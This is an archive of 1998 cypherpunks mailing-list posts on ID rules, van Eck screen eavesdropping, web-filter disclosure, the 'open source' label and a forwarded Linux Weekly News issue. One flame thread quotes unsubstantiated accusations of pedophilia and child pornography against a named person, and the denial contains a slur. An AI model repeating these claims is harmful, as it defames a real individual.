In-Reply-To: <v03102801b104e8dbf314@[207.167.93.63]>
Message-ID: <Pine.BSF.3.96.980210020545.16653A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Feb 1998, Tim May wrote:
> If a U.S. Passport is not considered enough I.D., because it doesn't have
> the Big Brother Inside magstripe, one walks away from the transaction.

Just as a data point, in the State of Oregon, an US passport is *not*
valid ID for alcohol purchases. Magstripe or no magstripe.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Tue, 10 Feb 1998 15:37:37 +0800
To: cypherpunks@toad.com
Subject: Vulis is asking for it
Message-ID: <199802100729.CAA14882@panix2.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)

   >   A psychopath like Guy Polis could just call a TV station and claim that
   >   he put some poison in the water supply which would take a few days to
   >   test for.

   >   I recall that there was a bunch of bomb threates at Salomon Brothers last
   >   year, right after Guy Polis was fired from his contractor job.  Do you
   >   suppose the psychotic pedophile did it?
   >   
   >   Dr.Dimitri Vulis KOTM
   >   Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

Your continued defamation is going to get you in a lot of trouble.

Cease it now, asshole.

Or you'll be the next Tawana Brawley defamation trial.

>   From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)

> #   Guy Polis (guy@panix.com, eviljay@bway.net) is a pedophile child
                 ^^^^^^^^^^^^^
> #   molester who was fired from his consulting position at Salomon Brothers
> #   after he was caught masturbating in his cubicle at the child pornography
> #   JPEGs that he downloaded from the Internet.
> #
> #   In retaliation, Guy Polis spammed the firewalls mailing list with megabytes
> #   of e-mail logs that he "intercepted" at Salomon Brothers, and accused
> #   several of his former co-workers and supervisors of various crimes.
> #
> #   As far as I can determine, Guy Polis has been unemployed since the time
> #   he was fired from Salomon.  If anyone knows otherwise, please let me know.


Besides the obvious, you've got _everything_ wrong.

   o I was not fired
   o I am not a psychopath
   o I did not download child porno
   o I am not AIDS-infected
   o I am not a faggot
   o I have been continuously employed since completing my Salomon contract
   o no one (name them) at Salomon or any other firm has stated otherwise.
   o I am not a pedophile

You'd better stop lying.

---guy

   Don't cross the line again.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Feb 1998 09:57:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <199802082027.PAA00347@users.invweb.net>
Message-ID: <199802100152.CAA03245@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Yup.  It's really annoying to have to give the California DMV lots of
> personal information about myself so they can track down deadbeat dads,
> given that I'm not even a dad, much less a deadbeat dad, and so they
> can track down Mexicans who want to drive without citizenship papers,
> and similar presumptions of potential guilt.

Actually, thanks to NAFTA, the Mexicans can drive without citizenship
papers, and they don't have to give the California DMV shit.  All they
need is a valid mexican driver license and they can drive in the US.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Tue, 10 Feb 1998 10:18:37 +0800
To: cypherpunks@cyberpass.net
Subject: What Jim Choate doesn't know
Message-ID: <199802100200.DAA04492@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



When Jim Choate writes about something that I know about, he is usually
wrong.  Look at the hash he made of quantum mechanics recently.  And don't
get me started on his blunders regarding cryptography.

So when he writes about something I don't know about, like the EM
emissions of video tubes, I tend to assume the same thing.  He's probably
all messed up.

Anybody else have the same experience?

And how about his countless off-topic posts, forwarding all kinds of
pointless crap?  Is anyone else sick of that, too?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 10 Feb 1998 10:01:07 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: SOFT TEMPEST (fwd)
In-Reply-To: <199802092357.RAA25254@einstein.ssz.com>
Message-ID: <Pine.BSF.3.96.980210024833.16653B-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Feb 1998, Jim Choate wrote:
> That's good. The thought that given current technology a signal reception
> van could pull one monitors display out of a building that could potentialy
> have 1,000+ pc's (my last job had about 1500/floor and 3 floors) at a range
> of say 200 ft. is truly incomprehensible. If it works that is a feat worth
> many laurels.

I don't know about displaying the screens of several thousands of PC's at
a site, but you can easily select any given screen of several dozens of
PC's. Using $100 worth in equipment plus a  [>>$100] quality frequency
generator.

At HIP'97, I watched a van Eck demonstration given by a German professor.
Using cheap analog equipment and one of the better HP frequency
generators, he pulled screen images from the power line, the networking
cable, and out of thin air. Since the oscillators in the devices to be
monitored all have slightly different frequencies, you can actually tune
the monitoring equipment to a specific PC. Even if there are numerous PC
on the same floor of the building.

I am told screen images can be captured up to 600 meters along the power
line.

Now all this was done without the use of a DSP. I can only imagine what
one could capture after adding a DSP to the setup.

-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "WebWarrior3@InfoWar.Com" <WebWarrior3@InfoWar.Com>
Date: Tue, 10 Feb 1998 16:47:28 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <34E01274.4531F0CD@InfoWar.Com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:

> I don't mean to be flippant . At issue here is a very real issue of free
> choice and contracts. Customers cannot "demand" a list of criteria for
> blocked sites any more than customers can demand a list of the selection
> criteria a bookstore uses, or a magazine editor uses, and so on.

Ever hear of consumer protection laws? There are many cases where consumers
are allowed to "demand" information regarding their purchases...you were being
flippant. One subscribes to a magazine because one knows what the focus of the
content is and one chooses to receive that periodical; not because the
magazine MAY have an editorial policy to not cover any stories on the
"Oddities of Toenail Fungus in Bleached Blonde Yaks from Manhattan."

> I make fun of Cyber Sitter and other Net.Nannies, but there's no role for
> "disagreeing with the fact" (whatever that infelicitous expression may
> mean) that they usually don't publicize their criteria.

Pardon my poor choice of words, please.  Looking back on it, I can see that I
could have chosen a better way to express my meaning.  In case you did not get
the gist, let me clarify it for you:  I find it to be an irresponsible
business practice for a company not to provide a customer with information on
exactly what a product does and does not do.  In a case where a product claims
to 'protect' children from certain 'harmful' material, parents should be able
to view these criteria in order to:A) discern whether they agree that the
material is harmful
and
B) make an educated choice regarding which, if any, of these products they
want to purchase.

Saying that a customer can not demand to know what the product does is like
saying that a car manufacturer should not have to tell potential customers if
the engine block is made of aluminum, cast iron, or wood.  Likewise, remember
an agency called the FDA?  Hmm, wonder if one of the reasons we have
ingredient labels on our packaged food is so people can verify that certain
ingredients are not in the products.  Have any allergies, Tim?

> If you can figure out their criteria, great...

Huh?  Where did that come from?

> But make sure that your "disagreeing with the fact" is not translated into
> calling
> for disclosure laws. That way lies statism.

There are already consumer protection laws.  I don't think that this is a
concentration of extensive economic controls in the State, do you?  Really,
Tim...

It is neither my option nor is it my responsibility to change someone's little
paranoid mind should they confuse consumer protection with statism, that is a
job for a psychiatrist or a professor.

Scott R. Brower
http://www.infowar.com
http://www.efflorida.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Tue, 10 Feb 1998 18:37:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
Message-ID: <88b57910d1bea792655156201f962142@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green <shamrock@cypherpunks.to> enlightened us with:

> On Mon, 9 Feb 1998, Tim May wrote:
> > If a U.S. Passport is not considered enough I.D., 
> > because it doesn't have the Big Brother Inside 
> > magstripe, one walks away from the transaction.
> 
> Just as a data point, in the State of Oregon, an US 
> passport is *not* valid ID for alcohol purchases. 
> Magstripe or no magstripe.

Of course not! The People's Socialist Nirvana of Oregon
is a foreign country. Just the fact that almost all
other foreign countries recognize the U.S. passport as
valid identification for things far more momentous than
the purchase of alcohol doesn't mean that the PSNofO
has to!

What do they require in Oregon? A little holographic
tatoo in paisley? A barcode on the tongue? Oh, I know!
A machine-readable ID on the inside of the rectum!

Has anyone figured out the obvious answer to this shit?
If you have, don't answer. And don't send me the bodies
by UPS collect, either.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 10 Feb 1998 13:54:08 +0800
To: cypherpunks@toad.com
Subject: King Willie:-- He's between Iraq and a Hard-On
Message-ID: <199802100536.GAA01716@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain




Well... It looks as though the 17th will be a "good day to die"
if your an Iraqi...Many sources seem to be targeting the window
of Feb 17 - Feb 23 for the start of hostilities...
Wag the dawg... comes to mind of course... I wouldn't put it past
King Willie to do such a thing to deflect attention from Peckergate..
It seems to me though that the lunatic in charge of North Korea
might just find that Feb 17- 23 is also a good time to play
games in the south :(  after all... the worlds policeman will be
preoccupied and stretched mighty thin... 
        





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@cypherpunks.to>
Date: Tue, 10 Feb 1998 13:56:00 +0800
To: Dave Emery <die@die.com>
Subject: Re: SOFT TEMPEST (fwd)
In-Reply-To: <19980209235936.37986@die.com>
Message-ID: <Pine.BSF.3.96.980210064254.17180A-100000@pakastelohi.cypherpunks.to>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Feb 1998, Dave Emery wrote:

> On Tue, Feb 10, 1998 at 03:03:53AM +0100, Lucky Green wrote:
> > 
> > Now all this was done without the use of a DSP. I can only imagine what
> > one could capture after adding a DSP to the setup.
> 
> 	Miles...
> 	
> 	Given static screen images and thousands of repetitions in a few
> seconds the processing gain from integration of the signal verus the 
> uncorrelated noise over thousands of cycles gets quite interesting. And
> add to that the tricks one can do with comb filters and combining
> together the correllated energy from several harmonics of the dot clock
> one can see that getting signal out from under the trash is easy even at
> considerable distances.

That would be my analysis as well. Note that the van Eck demonstration I
saw didn't even make use of the common analog tricks, such as using a
super heterodyne receiver. Not to mention the near magical capabilities of
a few Fourier transforms for pulling a nice, fat signal spike out of all
that "white noise".

There wasn't a single person watching said demonstration in that brutally
hot tent at HIP'97 that didn't walk away impressed. And I can off the top
of my head come up with a design that would improve the gain by at least
20dB over what was used there..


-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Feb 1998 20:27:09 +0800
To: Lucky Green <tcmay@got.net>
Subject: Re: Driver Licenses
In-Reply-To: <v03102801b104e8dbf314@[207.167.93.63]>
Message-ID: <3.0.2.32.19980210071222.036cee1c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:12 AM 2/10/98 +0100, Lucky Green wrote:
>On Mon, 9 Feb 1998, Tim May wrote:
>> If a U.S. Passport is not considered enough I.D., because it doesn't have
>> the Big Brother Inside magstripe, one walks away from the transaction.
>
>Just as a data point, in the State of Oregon, an US passport is *not*
>valid ID for alcohol purchases. Magstripe or no magstripe.
>
>-- Lucky Green <shamrock@cypherpunks.to> PGP v5 encrypted email preferred.
>   "Tonga? Where the hell is Tonga? They have Cypherpunks there?"

So I guess foreigners can't buy booze in Oregon at all.  

The new (last 10 years) passports don't have a mag stripe but do have the ICAO machine- reabable text string including a replay of the Passport info together with checksum digits.  There is also space for a National ID Number for those countries which have one but it is blank on US passports since we don't have a national ID.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Feb 1998 20:40:31 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Driver Licenses
In-Reply-To: <199802082027.PAA00347@users.invweb.net>
Message-ID: <3.0.2.32.19980210071357.036c98d8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



At 02:52 AM 2/10/98 +0100, Anonymous wrote:
>> Yup.  It's really annoying to have to give the California DMV lots of
>> personal information about myself so they can track down deadbeat dads,
>> given that I'm not even a dad, much less a deadbeat dad, and so they
>> can track down Mexicans who want to drive without citizenship papers,
>> and similar presumptions of potential guilt.
>
>Actually, thanks to NAFTA, the Mexicans can drive without citizenship
>papers, and they don't have to give the California DMV shit.  All they
>need is a valid mexican driver license and they can drive in the US.

NAFTA has nothing to do with it.  You've always been able to drive with a foreign license.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Feb 1998 01:20:12 +0800
To: "cypherpunks@Algebra.COM
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <v03102800b106398ae3b8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:40 AM -0800 2/10/98, WebWarrior3@InfoWar.Com wrote:
>Tim May wrote:
>
>> I don't mean to be flippant . At issue here is a very real issue of free
>> choice and contracts. Customers cannot "demand" a list of criteria for
>> blocked sites any more than customers can demand a list of the selection
>> criteria a bookstore uses, or a magazine editor uses, and so on.
>
>Ever hear of consumer protection laws? There are many cases where consumers
>are allowed to "demand" information regarding their purchases...you were being
>flippant. One subscribes to a magazine because one knows what the focus of the

No, I was _not_ being flippant (which was what I said). I was being
libertarian.

As far as I'm concerned, absent a contract, anyone who "demands" something
from me is on thin ice.

Like I said, if you're unhappy that CyberSitter or NetNanny will not
provide you with information you wish to have, use another service.

But don't cite "Consumer Protection Laws."

--Tim May


Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 00:01:45 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: SOFT TEMPEST (fwd)
Message-ID: <199802101550.JAA02061@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Feb 1998 06:46:55 +0100 (CET)
> From: Lucky Green <shamrock@cypherpunks.to>
> Subject: Re: SOFT TEMPEST (fwd)

> That would be my analysis as well. Note that the van Eck demonstration I
> saw didn't even make use of the common analog tricks, such as using a
> super heterodyne receiver.

In what context? The only place a super-het would buy you any selectivity,
and its tight bandwidth may actualy work against you, is in capturing the
data on each trace. The syn pulses aren't amplitude sensitive so much as
time ordered. If you can get a clear signal use that to fire a Schmitt
trigger and synthesize your sync pulses and ramps/stairstep generators from
that. Using a super-het for this is over-kill.

> Not to mention the near magical capabilities of
> a few Fourier transforms for pulling a nice, fat signal spike out of all
> that "white noise".

Doing a Fourier on the grass won't pull the signal out unless you've got an
integration function in there to filter the noise (ala flying cap filter).
If the signal is strong enough that a Fourier can be applied to it then the
signal is most likely strong enough to use directly. The data we're trying
to get out isn't that complicated; two sync pulses and the e-beam modulation
data.

I would like to request that you provide a better description of the
equipment used at HIP for the demo. If the various descriptions of that are
accurate his signal detection range was around 50 - 100 ft. and he was using
specialy sized fonts (special in the context that you wouldn't use them for
a spreadsheet or document processing). Is this correct?


    ____________________________________________________________________
   |                                                                    |
   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Mynott <steve@tightrope.demon.co.uk>
Date: Tue, 10 Feb 1998 17:59:05 +0800
To: Lucky Green <die@die.com>
Subject: Re: SOFT TEMPEST (fwd)
In-Reply-To: <19980209235936.37986@die.com>
Message-ID: <19980210095845.47535@tightrope.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, Feb 10, 1998 at 06:46:55AM +0100, Lucky Green wrote:

> There wasn't a single person watching said demonstration in that brutally
> hot tent at HIP'97 that didn't walk away impressed. And I can off the top
> of my head come up with a design that would improve the gain by at least
> 20dB over what was used there..

I wasn't impressed.

That main tent was an old circus tent and was huge with enough room for
one thousand people.  Unfortunately it had the effect of focusing and
amplifying the already excessive heat on the sweating and dehydrated
victims sitting in it.  By the final day an attempt had been made to
open it up a bit more and to spray cold water on it.

The first thing I saw was a demonstration of the "Van Eck effect".
The idea was to pick up the screen display of someone's monitor at a
distance to read the information off it.  The lecturer was a German
professor and spoke heavily accented English.  He was very much as a
German professor might be shown in a film.  He spoke a lot about "Ze
Incriminating Emissions", which seemed rather funny at the time.

He had an aerial, which looked like an unconvincing Dr Who prop,
attached to a standard TV.  The circus tent atmosphere led somehow
to the impression that he was a stage magician performing tricks.
Also the audience's habit of cheering after each trick didn't help.
On the target PC screen were a few words in a very large font and he was
able to display this up on the TV.  He also put a device around the power
 supply lead and could pick up a better picture this way.  There were
mutterings from the audience, many of whom seemed unimpressed.  At the
question session the poor chap got a rather hard ride.  The gist of it
being "What we have been shown is twenty years old, there are modern
digital techniques that are much better".  His reply was "They are very
expensive and we have only just got the equipment and the results aren't
finished yet."  The counter measures were Tempest shielding.

In short if your password is visible on your monitor in letters three
inches high and there is a van outside your office with a large aerial
and German plates this might mean trouble.  Or maybe the NSA can pick
 it up anyway from America using the "newer techniques".


-- 
Steve Mynott
"no man or group of men shall aggress upon the person or property of anyone
else."  -- Murray N. Rothbard





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Feb 1998 02:16:31 +0800
To: Adam Back <Markus.Kuhn@cl.cam.ac.uk
Subject: Narcware
In-Reply-To: <E0y1wKR-00084W-00@heaton.cl.cam.ac.uk>
Message-ID: <v03102803b106476925d8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:34 PM -0800 2/9/98, Adam Back wrote:

>I am not sure I want to see my computer narcing out over RF
>frequencies what software is installed -- once enabled for corporates


Why not monkeywrench the narcware to narc out falsely?

Imagine 100 copies of a program all screaming "Bill Gates"!

(ObCrypto: One can imagine methods to broadcast a new signifier each time a
program is started...some kind of zero knowledge approach. But this gets
difficult when the broadcast program is under the control of those trying
to defeat the system. A well known problem. E.g., if N copies are all
identical, and the ZKIPS approach is generated in software, the N copies
will overlap signals. And so on. I expect the Anderson-Kuhn approach
broadcasts a single identifier, though I have not yet had time to look at
their paper, so I may be wrong here.)

Narcware will face a lot of customer resistance.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 00:35:18 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Open Source Software - Proposal (fwd)
Message-ID: <199802101637.KAA02458@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Tue Feb 10 10:35:27 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802101635.KAA02425@einstein.ssz.com>
Subject: Open Source Software - Proposal
To: users@ssz.com (SSZ User Mail List)
Date: Tue, 10 Feb 1998 10:35:25 -0600 (CST)
Cc: friends@ssz.com (Ravage's Friends), stugreen@realtime.net
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 3835      


Forwarded message:

> X-within-URL: http://earthspace.net/~esr/open-source.html

>    
>                 GOODBYE, "FREE SOFTWARE"; HELLO, "OPEN SOURCE"
>                                        
>    After the Netscape announcement broke in February early 1998 I did a
>    lot of thinking about the next phase -- the serious push to get "free
>    software" accepted in mainstream corporate America. And I realized we
>    have a serious problem with "free software" itself.
>    
>    Specifically, we have a problem with the term "free software", itself,
>    not the concept. I've become convinced that the term has to go.
>    
>    The problem with it is twofold. First, it's confusing; the term "free"
>    is very ambiguous (something the Free Software Foundation's propaganda
>    has to wrestle with constantly). Does "free" mean "no money charged?"
>    or does it mean "free to be modified by anyone", or something else?
>    
>    Second, the term makes a lot of corporate types nervous. While this
>    does not intrinsically bother me in the least, we now have a pragmatic
>    interest in converting these people rather than thumbing our noses at
>    them. There's now a chance we can make serious gains in the mainstream
>    business world without compromising our ideals and commitment to
>    technical excellence -- so it's time to reposition. We need a new and
>    better label.
>    
>    I brainstormed this with some Silicon Valley fans of Linux the day
>    after my meeting with Netscape (Feb 5th). We kicked around and
>    discarded several alternatives, and we came up with a replacement
>    label we all liked: "open source".
>    
>    John "maddog" Hall and Larry Augustin, both of the Linux International
>    Board of Directors, were in on the brainstorming session (though
>    interestingly enough the term "open source" was suggested by
>    non-hacker Chris Peterson, observing for the Foresight Institute).
>    Linus Torvalds himself approved it the following day. And it isn't a
>    Linux-only thing; Keith Bostic likes it and says he thinks the BSD
>    community can be brought on board.
>    
>    We suggest that everywhere we as a culture have previously talked
>    about "free software", the label should be changed to "open source".
>    Open-source software. The open-source model. The open source culture.
>    The Debian Open Source Guidelines. (In pitching this to corporate
>    America I'm also going to be invoking the idea of "peer review" a
>    lot.)
>    
>    Bruce Perens has volunteered to register "open source" as a trademark
>    and hold it through Software in the Public Interest. And RMS himself
>    has said he'll use the term (though not exclusively) as long as the
>    Open Source Definition Bruce is working up isn't weaker than the
>    Debian Free Software Guidelines.
>    
>    And, we should explain publicly the reason for the change. Linus has
>    been saying in "World Domination 101" that the open-source culture
>    needs to make a serious effort to take the desktop and engage the
>    corporate mainstream. Of course he's right -- and this re-labeling, as
>    Linus agrees, is part of the process. It says we're willing to work
>    with and co-opt the market for our own purposes, rather than remaining
>    stuck in a marginal, adversarial position.
>    
>    It's crunch time, people. The Netscape announcement changes
>    everything. We've broken out of the little corner we've been in for
>    twenty years. We're in a whole new game now, a bigger and more
>    exciting one -- and one I think we can win.
>    
>    
>      _________________________________________________________________
>    
>    Back to Eric's Home Page Up to Site Map $Date: 1998/02/10 03:55:36 $
>    
>    
>     Eric S. Raymond <esr@snark.thyrsus.com>
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 00:37:35 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: New: Linux Weekly News (fwd)
Message-ID: <199802101637.KAA02468@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Tue Feb 10 10:34:50 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199802101634.KAA02399@einstein.ssz.com>
Subject: New: Linux Weekly News
To: users@ssz.com (SSZ User Mail List)
Date: Tue, 10 Feb 1998 10:34:40 -0600 (CST)
Cc: friends@ssz.com (Ravage's Friends), stugreen@realtime.net
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 19324     


Forwarded message:

> X-within-URL: http://www.eklektix.com/lwn/

>                                LINUX WEEKLY NEWS
>                                        
>    
>    
>    
>      _________________________________________________________________
>    
>    -->
>    
>    Linux Weekly News
>    
>    
>    
>    Bringing you the latest news from the Linux World.
>    Dedicated to keeping Linux users up-to-date, with concise news for all
>    interests
>    Published February 5, 1998
>    
>    Sections:
>    Linux articles
>    Security
>    Kernel news
>    Distributions
>    Ports
>    Software Development
>    Tips and tricks
>    Announcements
>    
>    
> Leading items
> 
>    This is going to be the year of free software. I have honestly come to
>    believe that. The free software movement is about to make tremendous
>    gains in respect and mindshare in realms where it has long been
>    ignored. Big software firms may want to start worrying, because the
>    world is changing around them.
>    
>    Anybody who didn't read Eric S. Raymond's The Cathedral and the Bazaar
>    paper should go and do so now. It describes the Linux development
>    model nicely, as well as the reasons for the success of that model.
>    Netscape has credited this paper with being a crucial influence in
>    their decision to free the source to their browser.
>    
>    As of this writing, Eric is evidently in Silicon Valley discussing
>    licensing terms with Netscape. The word is that he is also meeting
>    with several other "leading Silicon Valley CEO's" to discuss the free
>    software model. One wonders who else may decide to adopt the bazaar
>    model of development.
>    
>    Whether or not other firms follow Netscape in the near future, free
>    software now has a visibility that was lacking before. Peruse the set
>    of articles listed below, and you'll see what we mean. This can only
>    be good for the Linux world, as the validity of its model of
>    development gains the recognition it deserves. It's looking like
>    interesting times.
>    
>    David Miller, the force behind the Sparc and SGI ports, finally
>    resurfaced after a longish, low-profile period. To see what he has
>    been doing, check out the Cobalt Micro page. I don't know anybody who
>    has actually run one of these cool, blue Linux boxes, but they look
>    like a fun toy...
>    
>    Does unix need to be rescued from the hackers?. This item isn't
>    particularly new, but Michael Hoffman's article on the need for a
>    seamless graphical user interface for unix systems is still good food
>    for thought. Another person, Perry Harrington, would like to replace
>    the X window system with something better, and which would include a
>    serious user interface policy. See his page if you would like to
>    participate.
>    
>    Peruse the LWN Archives.
>    
>    Our obligatory Linux links page.
>    
>    Got some feedback, some news to publish, or something else you would
>    like to tell us? lwn@eklektix.com is our address.
>    
>    Or would you like to be notified when new editions of the Linux Weekly
>    News are published? Click here and send a blank message.
>    
>    Please see our contact page for other contact information.
>    
>    The permanent site for this page is here.      [Articles]
>    
> Linux in the news
> 
>    Wired news ran an article on free software last week. The obvious
>    point of interest was Netscape, but Linux rated some favorable mention
>    as well. It's a reasonable discussion of the merits of free software
>    in general.
>    
>    Accolades from the Emerald Isle. An article in the Irish Times
>    financial section is also favorable toward Linux, explicitly as an
>    alternative to NT. I assume that "Linux remains at the coalface
>    technologically [...]" is a positive thing...
>    
>    There is a four-part series on free software in news.com this week.
>    It's a reasonably good and sympathetic series, despite its title:
>    "Socialist Software."
>    
>    Many of us have heard the old argument: "There is no technical support
>    for Linux." Well, then, why has Infoworld awarded its 1997 technical
>    support award to the Linux community? It's a great bit of recognition
>    that just because software is free doesn't mean that it's unsupported.
>    Show this one to your boss.
>    
>    Ah yes, and their award for operating systems went to Red Hat 5.0...
>    
>    Two other articles in Infoworld: Nicolas Petreley thinks that
>    Netscape's move could be a winning strategy, while Mark Tebbe talks of
>    the model used by "a renegade OS such as Linux" and raises, you
>    guessed it, the spectre of support.
>    
>    "[Linux] is emerging as a viable competitor to Microsoft's Windows NT"
>    according to an article in the New York Times. Note that this site
>    requires registration now... The old convention of using 'cypherpunks'
>    for the username and password will get you in, if you don't wish to
>    register separately.
>    
>    The folks at TBTF ran a couple of Linux-related articles this week.
>    One, dedicated to estimating the size of the Linux community, comes up
>    with 5-7 million installed Linux systems in the world.
>    
>    We are told January's issue of Sky & Telescope has a nice Linux
>    article in it. We haven't seen it, though; check your local newsstand.
>    
>    
>    CNN's article on top selling software for January includes a reference
>    to Red Hat Linux. It's number three in the "Business Software
>    (MS-DOS/OS/2)" section. "Business software" can almost make sense, but
>    "MS-DOS"???        [Security] A serious X-windows security problem has
>    been reported in XKB, depending on X11 version and environment, which
>    can allow local users to exploit a "feature" XDB to execute arbitrary
>    programs with extra privileges. Quick vulnerability check and fix are
>    provided in the posting to linux-alert. You can also see Red Hat's
>    advisory on this bug.
>    
>    The AT&T Crowds project has chosen linux for their next target. Crowds
>    is intended to protect a person's anonymity as they browse the web and
>    already runs under SunOS, Solaris and Irix.
>    
>    The filter program that comes as part of the elm-2.4 package contains
>    two vulnerabilities, one of which could be remotely exploited. Details
>    here.
>    
>    Michal Zalewski reported a problem with gzexe, part of the gzip
>    package. Seems it uses predictable filenames in /tmp, which may allow
>    users to destroy the contents of files on your system. Use of gzexe is
>    not widespread, but Red Hat recommends upgrading your version of gzip.
>           [Kernel] The current development kernel version is 2.1.85. It
>    includes the ability to boot off of MD striped disks, a bunch of SCSI
>    changes for machines with the IBM MCA bus, bug fixes, and
>    documentation updates. Thus far, reported problems are few, though
>    there are evidently some build problems with the MCA SCSI stuff.
>    
>    Alan Cox states that TCP is "somewhat broken" in the 2.1.8x series,
>    "and will remain so until it's fixed." As always with development
>    kernels, be careful out there. Patches continue to roll in towards a
>    (still somewhat distant) 2.2 release.
>    
>    A stated goal, once development starts on 2.3, is reworking and
>    cleaning up the sound driver code. Some of you may have noticed that
>    it can be a bit, um, difficult to configure and make work right. It's
>    not clear how that development will proceed, but Colin Plumb posted a
>    good, concise article on some of the issues involved.
>    
>    Richard Gooch continues to update his enhancements. The MTRR patch
>    (MTRR stands for Memory Type Range Registers - now we all understand,
>    right?), which greatly speeds frame buffer access, is up to rev 1.8
>    (against kernel 2.1.84). His "devfs" patch (runtime creation of the
>    /dev tree) is up to version 18. Both are available from his patch
>    page. Still no word on when (or if) these patches will go into the
>    2.1 kernel.
>    
>    Unless you have a multiprocessor machine, be sure not to compile your
>    kernels with SMP enabled. Recent development kernels seem to be even
